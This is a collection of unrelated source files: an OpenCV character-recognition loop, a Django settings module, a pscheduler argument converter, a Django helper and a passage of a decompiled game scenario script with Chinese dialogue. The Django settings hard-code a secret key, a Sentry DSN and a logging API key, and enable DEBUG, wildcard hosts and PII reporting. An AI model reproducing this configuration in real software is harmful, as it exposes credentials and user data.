    result = loaded_model.predict(test_image.reshape(1, 64, 64, 1))
    prediction = {'ZERO': result[0][0],
                  'ONE': result[0][1],
                  'TWO': result[0][2],
                  'THREE': result[0][3],
                  'FOUR': result[0][4],
                  'FIVE': result[0][5],
                  'SIX': result[0][6],
                  'SEVEN': result[0][7],
                  'EIGHT': result[0][8],
                  'NINE': result[0][9],
                  'A': result[0][10],
                  'B': result[0][11],
                  'C': result[0][12],
                  'D': result[0][13],
                  'E': result[0][14],
                  'F': result[0][15],
                  'G': result[0][16],
                  'H': result[0][17],
                  'I': result[0][18],
                  'J': result[0][19],
                  'K': result[0][20],
                  'L': result[0][21],
                  'M': result[0][22],
                  'N': result[0][23],
                  'O': result[0][24],
                  'P': result[0][25],
                  'Q': result[0][26],
                  'R': result[0][27],
                  'S': result[0][28],
                  'T': result[0][29],
                  'U': result[0][30],
                  'V': result[0][31],
                  'W': result[0][32],
                  'X': result[0][33],
                  'Y': result[0][34],
                  'Z': result[0][35],
                  }
    # Sort classes by score, descending; the best label is prediction[0][0].
    prediction = sorted(prediction.items(), key=operator.itemgetter(1), reverse=True)
    cv2.putText(frame, prediction[0][0], (500, 70), cv2.FONT_HERSHEY_PLAIN, 1, (255,0,0), 1)
    cv2.imshow("Frame", frame)

    # ESC (keycode 27) quits the capture loop.
    interrupt = cv2.waitKey(10)
    if interrupt & 0xFF == 27:
        break

cap.release()
cv2.destroyAllWindows()
|
import sentry_sdk
from sentry_sdk.integrations.celery import CeleryIntegration
from sentry_sdk.integrations.django import DjangoIntegration
import os
import logging
from logdna import LogDNAHandler

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key, the Sentry DSN and the LogDNA ingestion key below
# are committed to source control -- rotate them and load them from the
# environment instead of hard-coding them here.
SECRET_KEY = '(14f_d6lne@(mqpw^^(&tovbol12b&tkxxouaxmr%&s&p^00d!'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = ['*']

# Application definition
INSTALLED_APPS = [
    'chat',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
    'users',
    'django_extensions',
    'channels',
    'django_elasticsearch_dsl',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'config.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'config.wsgi.application'
# Channels (websocket) entry point.
ASGI_APPLICATION = "config.routing.application"

ELASTICSEARCH_DSL = {
    'default': {
        'hosts': 'localhost:9200'
    },
}

# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization / time handling.
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True

STATIC_URL = '/static/'
MEDIA_URL = '/media/'

# Error reporting: Sentry with the Django and Celery integrations.
sentry_sdk.init(
    dsn="https://100cf029a2bc407d9d0ade68aad0a203@o427990.ingest.sentry.io/5372863",
    integrations=[DjangoIntegration(), CeleryIntegration()],
    send_default_pii=True
)

CACHES = {
    'default': {
        'BACKEND': 'redis_cache.RedisCache',
        'LOCATION': 'localhost:6379',
    },
}

LOGGING = {
    'version': 1,
    'handlers': {
        'logdna': {
            'level': logging.DEBUG,
            # Bug fix: LogDNAHandler lives in the third-party ``logdna``
            # package, not in the stdlib ``logging.handlers`` module.  The
            # old dotted path ('logging.handlers.LogDNAHandler') made
            # logging.config.dictConfig fail to build this handler.
            'class': 'logdna.LogDNAHandler',
            'key': 'b4f5b376585199181e9f3942cbb87b3f',
        },
        'console': {
            'level': 'INFO',
            'class': 'logging.StreamHandler',
        },
    },
    'loggers': {
        'django': {
            'handlers': ['logdna', 'console'],
            'level': logging.DEBUG
        },
        'users': {
            'handlers': ['logdna', 'console'],
            'level': logging.INFO
        }
    },
}
|
#!/usr/bin/env python3
#
# Convert command-line options to a test specification
#
# Arguments arrive either on the command line or as a JSON array of
# scalars on stdin; either way they are normalized to a list of strings
# before option parsing.

import optparse
import pscheduler
import sys

if len(sys.argv) > 1:
    # Args are on the command line
    args = sys.argv[1:]
else:
    # Args are in a JSON array on stdin
    json_args = pscheduler.json_load(exit_on_error=True)
    if not isinstance(json_args, list):
        pscheduler.fail("Invalid JSON for this operation")
    for arg in json_args:
        # Only JSON scalars (strings and numbers) are legal arguments.
        if not isinstance(arg, (str, int, float)):
            pscheduler.fail("Invalid JSON for this operation")
    # (Removed a dead `args = []` that was immediately overwritten.)
    args = [str(arg) for arg in json_args]

# Gargle the arguments
opt_parser = pscheduler.FailingOptionParser(epilog=
"""Examples:
task idlebg --duration PT1M15S
Do nothing locally for one minute and 15 seconds
task idlebg --duration PT20S --host ps2.example.org
Make ps2.example.org be idle for 20 seconds
task idlebg --duration PT20S --starting-comment "Let's get lazy."
Emit a custom comment before idling
task idlebg --duration PT20S --parting-comment "I got nothing done."
Emit a custom comment after idling
"""
)

opt_parser.add_option("-d", "--duration",
                      help="Idle duration (ISO8601)",
                      action="store", type="string",
                      dest="duration")
# The short version is capitalized because -h is for help.
opt_parser.add_option("-H", "--host",
                      help="Host which should be idle",
                      action="store", type="string",
                      dest="host")
opt_parser.add_option("-i", "--interval",
                      help="Result interval (ISO8601)",
                      action="store", type="string",
                      dest="interval")
opt_parser.add_option("-s", "--starting-comment",
                      help="Starting comment",
                      action="store", type="string",
                      dest="starting_comment")
opt_parser.add_option("-p", "--parting-comment",
                      help="Parting comment",
                      action="store", type="string",
                      dest="parting_comment")

(options, remaining_args) = opt_parser.parse_args(args)
if len(remaining_args) != 0:
    pscheduler.fail("Unusable arguments: %s" % " ".join(remaining_args))

result = { 'schema': 1 }

# Copy each set option onto its JSON spec key (note the underscore ->
# hyphen renaming for the comment options); unset options are omitted.
for attr, key in [
        ("duration", "duration"),
        ("host", "host"),
        ("interval", "interval"),
        ("starting_comment", "starting-comment"),
        ("parting_comment", "parting-comment"),
]:
    value = getattr(options, attr)
    if value is not None:
        result[key] = value

pscheduler.succeed_json(result)
|
#-*- coding:utf8 -*-
def update_model_fields(obj, update_fields=None):
    """Persist only the given fields of a Django model instance.

    Runs a queryset ``update()`` restricted to ``obj``'s primary key,
    copying the current in-memory value of each named attribute.  Names
    the instance does not have are silently skipped.

    Args:
        obj: model instance with ``pk`` set.
        update_fields: iterable of attribute/field names to save.
            Defaults to saving nothing.

    Returns:
        Whatever ``QuerySet.update()`` returns (the matched-row count
        in Django).
    """
    # Fix: the original used a mutable default argument (``update_fields=[]``).
    if update_fields is None:
        update_fields = []
    field_entry = {}
    for name in update_fields:
        if hasattr(obj, name):
            field_entry[name] = getattr(obj, name)
    rows = obj.__class__.objects.filter(pk=obj.pk).update(**field_entry)
    return rows
from ED6ScenarioHelper import *
def main():
    """Scenario setup for map T0133 (Rolent City - clock tower)."""
    # Rolent City - clock tower (translated from: 洛连特市 钟楼)
    # Scenario file header: map identity, default BGM, no entry function.
    CreateScenaFile(
        FileName = 'T0133 ._SN',
        MapName = 'Rolent',
        Location = 'T0133.x',
        MapIndex = 10,
        MapDefaultBGM = "ed60010",
        Flags = 0,
        EntryFunctionIndex = 0xFFFF,
        Reserved = 0,
        IncludedScenario = [
            '',
            '',
            '',
            '',
            '',
            '',
            '',
            ''
        ],
    )

    # String table: index 8 is the file name; 9-11 are the display names of
    # the three NPCs declared below (runtime data, left in Chinese).
    BuildStringList(
        '@FileName', # 8
        '潘杜爷爷', # 9
        '艾娅莉', # 10
        '阿鲁姆', # 11
    )

    # Map entry point: camera / spawn parameters (field meanings are
    # engine-defined; Unknown_* names come from the decompiler).
    DeclEntryPoint(
        Unknown_00 = 6000,
        Unknown_04 = 0,
        Unknown_08 = 184000,
        Unknown_0C = 4,
        Unknown_0E = 270,
        Unknown_10 = 0,
        Unknown_14 = 8000,
        Unknown_18 = -10000,
        Unknown_1C = 0,
        Unknown_20 = 0,
        Unknown_24 = 0,
        Unknown_28 = 2600,
        Unknown_2C = 262,
        Unknown_30 = 315,
        Unknown_32 = 0,
        Unknown_34 = 360,
        Unknown_36 = 0,
        Unknown_38 = 0,
        Unknown_3A = 10,
        InitScenaIndex = 0,
        InitFunctionIndex = 0,
        EntryScenaIndex = 0,
        EntryFunctionIndex = 1,
    )

    # Character sprite sheets and their animation pattern files.
    AddCharChip(
        'ED6_DT07/CH01250 ._CH', # 00
        'ED6_DT07/CH01150 ._CH', # 01
        'ED6_DT07/CH01140 ._CH', # 02
    )

    AddCharChipPat(
        'ED6_DT07/CH01250P._CP', # 00
        'ED6_DT07/CH01150P._CP', # 01
        'ED6_DT07/CH01140P._CP', # 02
    )

    # NPC 0x8: init runs Function_3 (idle anim), talking runs Function_4.
    DeclNpc(
        X = 3275,
        Z = 0,
        Y = 2522,
        Direction = 180,
        Unknown2 = 0,
        Unknown3 = 0,
        ChipIndex = 0x0,
        NpcIndex = 0x101,
        InitFunctionIndex = 0,
        InitScenaIndex = 3,
        TalkFunctionIndex = 0,
        TalkScenaIndex = 4,
    )

    # NPC 0x9: talk handler is Function_5.
    DeclNpc(
        X = 54174,
        Z = 10300,
        Y = 44126,
        Direction = 180,
        Unknown2 = 0,
        Unknown3 = 1,
        ChipIndex = 0x1,
        NpcIndex = 0x181,
        InitFunctionIndex = 0,
        InitScenaIndex = 3,
        TalkFunctionIndex = 0,
        TalkScenaIndex = 5,
    )

    # NPC 0xA: talk handler is Function_6.
    DeclNpc(
        X = 54904,
        Z = 10300,
        Y = 44125,
        Direction = 180,
        Unknown2 = 0,
        Unknown3 = 2,
        ChipIndex = 0x2,
        NpcIndex = 0x181,
        InitFunctionIndex = 0,
        InitScenaIndex = 3,
        TalkFunctionIndex = 0,
        TalkScenaIndex = 6,
    )

    # Interactive trigger zone handled by Function_7 (ladder up).
    DeclActor(
        TriggerX = -300,
        TriggerZ = 0,
        TriggerY = 4140,
        TriggerRange = 800,
        ActorX = -300,
        ActorZ = 1000,
        ActorY = 4140,
        Flags = 0x7C,
        TalkScenaIndex = 0,
        TalkFunctionIndex = 7,
        Unknown_22 = 0,
    )

    # Interactive trigger zone handled by Function_8 (ladder down).
    DeclActor(
        TriggerX = 53450,
        TriggerZ = 10300,
        TriggerY = 47970,
        TriggerRange = 800,
        ActorX = 53450,
        ActorZ = 10000,
        ActorY = 47970,
        Flags = 0x7C,
        TalkScenaIndex = 0,
        TalkFunctionIndex = 8,
        Unknown_22 = 0,
    )

    # Function table: maps scena function indices to the defs below.
    ScpFunction(
        "Function_0_16A", # 00, 0
        "Function_1_1E2", # 01, 1
        "Function_2_204", # 02, 2
        "Function_3_205", # 03, 3
        "Function_4_21B", # 04, 4
        "Function_5_B46", # 05, 5
        "Function_6_D79", # 06, 6
        "Function_7_F29", # 07, 7
        "Function_8_10C7", # 08, 8
        "Function_9_10D1", # 09, 9
        "Function_10_2161", # 0A, 10
        "Function_11_21E4", # 0B, 11
    )
def Function_0_16A(): pass

label("Function_0_16A")
# Map init: show/hide the NPCs depending on story-progress scenario flags.
# The Jc(...) ops are conditional jumps; SetChrFlags(0x8, 0x80|0x8) hides
# NPC 0x8, ClearChrFlags(..., 0x80) makes 0x9/0xA visible.
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x4D, 0)), scpexpr(EXPR_END)), "loc_17E")
SetChrFlags(0x8, 0x80)
SetChrFlags(0x8, 0x8)
Jump("loc_1D3")
label("loc_17E")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x49, 7)), scpexpr(EXPR_END)), "loc_188")
Jump("loc_1D3")
label("loc_188")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x47, 1)), scpexpr(EXPR_END)), "loc_19C")
SetChrFlags(0x8, 0x80)
SetChrFlags(0x8, 0x8)
Jump("loc_1D3")
label("loc_19C")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x42, 3)), scpexpr(EXPR_END)), "loc_1A6")
Jump("loc_1D3")
label("loc_1A6")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x42, 2)), scpexpr(EXPR_END)), "loc_1C4")
ClearChrFlags(0x9, 0x80)
ClearChrFlags(0xA, 0x80)
SetChrFlags(0x8, 0x80)
SetChrFlags(0x8, 0x8)
Jump("loc_1D3")
label("loc_1C4")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x40, 5)), scpexpr(EXPR_END)), "loc_1CE")
Jump("loc_1D3")
label("loc_1CE")
SetChrFlags(0x8, 0x10)
label("loc_1D3")
# If flag 0x7F.2 is set, run the one-shot event in Function_9 on entry.
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x7F, 2)), scpexpr(EXPR_END)), "loc_1E1")
OP_A3(0x3FA)
Event(0, 9)
label("loc_1E1")
Return()
# Function_0_16A end
def Function_1_1E2(): pass

label("Function_1_1E2")
# Entry function: choose the map background variant from two scenario
# flags (0x42.3 unset AND 0x42.2 set -> "t0133_y", otherwise "t0133_n").
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x42, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x42, 2)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_1FA")
OP_B1("t0133_y")
Jump("loc_203")
label("loc_1FA")
OP_B1("t0133_n")
label("loc_203")
Return()
# Function_1_1E2 end
def Function_2_204(): pass

label("Function_2_204")
# Intentionally empty scena function (placeholder slot in ScpFunction).
Return()
# Function_2_204 end
def Function_3_205(): pass

label("Function_3_205")
# NPC init: infinite idle-animation loop (condition is the constant 1,
# so the OP_99 animation op repeats until the scena engine stops it).
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_21A")
OP_99(0xFE, 0x0, 0x7, 0x5DC)
Jump("Function_3_205")
label("loc_21A")
Return()
# Function_3_205 end
def Function_4_21B(): pass
label("Function_4_21B")
TalkBegin(0x8)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x4B, 1)), scpexpr(EXPR_END)), "loc_3FC")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_36F")
OP_A2(0x0)
ChrTalk(
0xFE,
(
"每天从塔顶向外眺望,\x01",
"真是让人很开心呀。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"季节的变化,\x01",
"城镇里人们的生活……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"每天都会发生\x01",
"各种各样的变化。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"最近经常在街上看到\x01",
"布露姆老太太。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"呵呵,\x01",
"她要去干什么呢?\x02",
)
)
CloseMessageWindow()
Jump("loc_3F9")
label("loc_36F")
ChrTalk(
0xFE,
(
"每天从塔顶向外眺望,\x01",
"真是让人很开心呀。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"每天都会发生\x01",
"各种各样的变化。\x02",
)
)
CloseMessageWindow()
label("loc_3F9")
Jump("loc_B42")
label("loc_3FC")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x49, 7)), scpexpr(EXPR_END)), "loc_541")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_4F1")
OP_A2(0x0)
ChrTalk(
0xFE,
(
"战争结束,修复钟楼的时候,\x01",
"梅尔达斯的儿子\x01",
"把大钟改成了导力驱动式。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"我能摆弄的部分越来越少了,\x01",
"真是感到有些寂寞啊……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"呵呵,\x01",
"这也是时代的变迁呀。\x02",
)
)
CloseMessageWindow()
Jump("loc_53E")
label("loc_4F1")
ChrTalk(
0xFE,
(
"战争结束,修复钟楼的时候,\x01",
"梅尔达斯的儿子\x01",
"把大钟改成了导力驱动式。\x02",
)
)
CloseMessageWindow()
label("loc_53E")
Jump("loc_B42")
label("loc_541")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x42, 3)), scpexpr(EXPR_END)), "loc_648")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_5F3")
OP_A2(0x0)
ChrTalk(
0xFE,
(
"那么,\x01",
"开始今天的检查吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"这个塔是洛连特的象征,\x01",
"代表了洛连特的历史,\x01",
"而且也是我的骄傲呀。\x02",
)
)
CloseMessageWindow()
Jump("loc_645")
label("loc_5F3")
ChrTalk(
0xFE,
(
"这个塔是洛连特的象征,\x01",
"代表了洛连特的历史,\x01",
"而且也是我的骄傲呀。\x02",
)
)
CloseMessageWindow()
label("loc_645")
Jump("loc_B42")
label("loc_648")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x42, 2)), scpexpr(EXPR_END)), "loc_7AF")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_725")
OP_A2(0x0)
ChrTalk(
0x8,
(
"一天又过去了, \x01",
"和平的日子实在是比什么都好啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
"一想起十年前的那次战争我就忍不住颤抖。\x02",
)
CloseMessageWindow()
ChrTalk(
0x8,
"战争什么的……不要再发生了。\x02",
)
CloseMessageWindow()
Jump("loc_7AC")
label("loc_725")
ChrTalk(
0x8,
"一想起十年前的那次战争我就忍不住颤抖。\x02",
)
CloseMessageWindow()
ChrTalk(
0x8,
"战争什么的……不要再发生了。\x02",
)
CloseMessageWindow()
label("loc_7AC")
Jump("loc_B42")
label("loc_7AF")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x40, 5)), scpexpr(EXPR_END)), "loc_8BE")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_865")
OP_A2(0x0)
ChrTalk(
0x8,
(
"还是老样子,\x01",
"钟声依旧那么动听。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"我呀,\x01",
"最喜欢听这个塔的钟声呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"这个钟不仅仅\x01",
"只有报时的作用哦。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"它还铭刻着\x01",
"洛连特的历史呢。\x02",
)
)
CloseMessageWindow()
Jump("loc_8BB")
label("loc_865")
ChrTalk(
0x8,
(
"这个钟不仅仅\x01",
"只有报时的作用哦。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"它还铭刻着\x01",
"洛连特的历史呢。\x02",
)
)
CloseMessageWindow()
label("loc_8BB")
Jump("loc_B42")
label("loc_8BE")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_ABC")
OP_A2(0x0)
ChrTalk(
0x101,
"#001F潘杜爷爷!\x02",
)
CloseMessageWindow()
OP_62(0x8, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Sleep(1000)
TurnDirection(0xFE, 0x101, 400)
ChrTalk(
0x8,
"嗯?这个声音是……\x02",
)
CloseMessageWindow()
OP_62(0x8, 0x0, 2000, 0x26, 0x27, 0xFA, 0x2)
Sleep(500)
ChrTalk(
0x8,
"……呵呵呵呵!\x02",
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"我还以为是谁呢,\x01",
"这不是卡西乌斯家的\x01",
"调皮姑娘和听话小子吗。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"最近你们好久都\x01",
"没有到这里来玩了呢,\x01",
"这段时间很忙吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F潘杜爷爷还是一直都在这里守着的吗?\x01",
" \x02",
)
)
CloseMessageWindow()
TurnDirection(0xFE, 0x102, 400)
ChrTalk(
0x8,
(
"这里就像\x01",
"我的家一样啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"我会一直守着这个钟楼,\x01",
"至死方休。\x02",
)
)
CloseMessageWindow()
Jump("loc_B42")
label("loc_ABC")
TurnDirection(0xFE, 0x101, 0)
ChrTalk(
0x8,
(
"这里就像\x01",
"我的家一样啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"我会一直守着这个钟楼,\x01",
"至死方休。\x02",
)
)
CloseMessageWindow()
label("loc_B42")
TalkEnd(0x8)
Return()
# Function_4_21B end
def Function_5_B46(): pass
label("Function_5_B46")
TalkBegin(0x9)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_D31")
OP_A2(0x1)
ChrTalk(
0x9,
(
"星星开始闪烁的时候,\x01",
"他在塔上这么和我说的呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
"可以和我交往吗……\x02",
)
CloseMessageWindow()
OP_62(0x9, 0x0, 2000, 0xA, 0xB, 0xFA, 0x2)
OP_22(0xF, 0x0, 0x64)
Sleep(1000)
ChrTalk(
0x9,
"哎呀㈱\x02",
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"这就是我\x01",
"梦寐以求的场景啊!\x02",
)
)
CloseMessageWindow()
OP_8C(0x9, 180, 500)
ChrTalk(
0x101,
(
"#501F(唔,\x01",
" 的确是一个相当不错的地方……)\x02\x03",
"#501F(为了听这句话\x01",
" 两个人特意跑上这里来?)\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F(呵呵……\x01",
" 这要看当事人是怎么想的了。)\x02",
)
)
CloseMessageWindow()
Jump("loc_D75")
label("loc_D31")
ChrTalk(
0x9,
"呵呵……\x02",
)
CloseMessageWindow()
ChrTalk(
0x9,
"好·幸·福·呢㈱\x02",
)
CloseMessageWindow()
OP_62(0x9, 0x0, 2000, 0xA, 0xB, 0xFA, 0x2)
OP_22(0xF, 0x0, 0x64)
Sleep(1000)
label("loc_D75")
TalkEnd(0x9)
Return()
# Function_5_B46 end
def Function_6_D79(): pass
label("Function_6_D79")
TalkBegin(0xA)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_ED1")
OP_A2(0x2)
ChrTalk(
0xA,
"#4S成功了!#3S\x02",
)
CloseMessageWindow()
ChrTalk(
0xA,
"听我说!\x02",
)
CloseMessageWindow()
ChrTalk(
0xA,
(
"她终于答应\x01",
"和我交往了啊!\x02",
)
)
CloseMessageWindow()
OP_8C(0xA, 180, 500)
OP_62(0xA, 0x0, 2000, 0xA, 0xB, 0xFA, 0x2)
OP_22(0xF, 0x0, 0x64)
Sleep(1000)
ChrTalk(
0xA,
(
"啊啊,女神大人……\x01",
"一整天所做的努力终于没有白费啊。\x02",
)
)
CloseMessageWindow()
OP_62(0x101, 0x0, 2000, 0x10, 0x13, 0xFA, 0x1)
OP_22(0x31, 0x0, 0x64)
Sleep(1000)
ChrTalk(
0x101,
"#501F(一、一整天……)\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F(真是坚持不懈换来的胜利呢。)\x02",
)
CloseMessageWindow()
Jump("loc_F25")
label("loc_ED1")
ChrTalk(
0xA,
(
"啊啊,女神大人……\x01",
"一整天所做的努力终于没有白费啊。\x02",
)
)
CloseMessageWindow()
label("loc_F25")
TalkEnd(0xA)
Return()
# Function_6_D79 end
def Function_7_F29(): pass
label("Function_7_F29")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x4D, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x72, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_10BD")
EventBegin(0x0)
OP_A2(0x26A)
FadeToDark(300, 0, 100)
SetMessageWindowPos(72, 320, 56, 3)
SetChrName("")
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"这里有架梯子可以通到上面的瞭望台去。\x07\x00\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
SetMessageWindowPos(72, 320, 56, 3)
FadeToBright(300, 0)
ChrTalk(
0x101,
"#003F…………………………\x02",
)
CloseMessageWindow()
OP_62(0x102, 0x0, 2000, 0x26, 0x26, 0xFA, 0x1)
Sleep(1000)
TurnDirection(0x102, 0x101, 400)
ChrTalk(
0x102,
(
"#014F哟,怎么了?\x01",
"突然愣着不动。\x02",
)
)
CloseMessageWindow()
OP_62(0x101, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
TurnDirection(0x101, 0x102, 400)
ChrTalk(
0x101,
(
"#506F啊……唔唔,没什么!\x02\x03",
"#006F对了,我们也上瞭望台看看吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#014F唔……?\x02",
)
CloseMessageWindow()
Jc((scpexpr(EXPR_EXEC_OP, "OP_42(0x2)"), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_NEG), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_10AC")
ChrTalk(
0x103,
"#522F…………………………\x02",
)
CloseMessageWindow()
label("loc_10AC")
Sleep(100)
NewScene("ED6_DT01/T0133 ._SN", 103, 0, 0)
IdleLoop()
Jump("loc_10C6")
label("loc_10BD")
NewScene("ED6_DT01/T0133 ._SN", 103, 0, 0)
IdleLoop()
label("loc_10C6")
Return()
# Function_7_F29 end
def Function_8_10C7(): pass

label("Function_8_10C7")
# Actor trigger (second ladder): switch to scene entry 102 of this map.
NewScene("ED6_DT01/T0133 ._SN", 102, 0, 0)
IdleLoop()
Return()
# Function_8_10C7 end
def Function_9_10D1(): pass
label("Function_9_10D1")
ClearMapFlags(0x1)
EventBegin(0x0)
SetChrPos(0x101, 54192, 10300, 44126, 180)
SetChrPos(0x102, 55561, 10300, 44126, 180)
SetMapFlags(0x10)
FadeToBright(4000, 0)
OP_6D(54670, 10300, 44190, 0)
OP_6C(330000, 0)
OP_67(0, 8300, -10000, 0)
OP_6B(1560, 0)
OP_6E(457, 0)
def lambda_114B():
OP_6D(54190, 10300, 41950, 6000)
ExitThread()
QueueWorkItem(0x0, 1, lambda_114B)
def lambda_1163():
OP_6C(302000, 6000)
ExitThread()
QueueWorkItem(0x0, 2, lambda_1163)
def lambda_1173():
OP_6E(539, 6000)
ExitThread()
QueueWorkItem(0x0, 3, lambda_1173)
def lambda_1183():
OP_67(0, 7060, -10000, 6000)
ExitThread()
QueueWorkItem(0x0, 0, lambda_1183)
Sleep(6500)
Fade(1500)
OP_6D(54620, 10300, 44190, 0)
OP_67(0, 6690, -10000, 0)
OP_6B(1660, 0)
OP_6C(225000, 0)
OP_6E(476, 0)
SetChrPos(0x101, 53950, 10300, 44150, 180)
SetChrPos(0x102, 55250, 10300, 44150, 180)
Sleep(2000)
ChrTalk(
0x101,
(
"#501F#2P哈啊~\x01",
"早上的空气真是清新……\x02",
)
)
CloseMessageWindow()
TurnDirection(0x101, 0x102, 400)
ChrTalk(
0x101,
(
"#001F#2P看啊,约修亚。\x01",
"从这里能看到咱们家呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#019F#6P真的,能看到屋顶呢。\x02",
)
CloseMessageWindow()
TurnDirection(0x102, 0x101, 400)
ChrTalk(
0x102,
(
"#010F#6P不过,\x01",
"平常你都不想来这里的,\x01",
"今天这是吹的什么风啊?\x02\x03",
"我本来以为\x01",
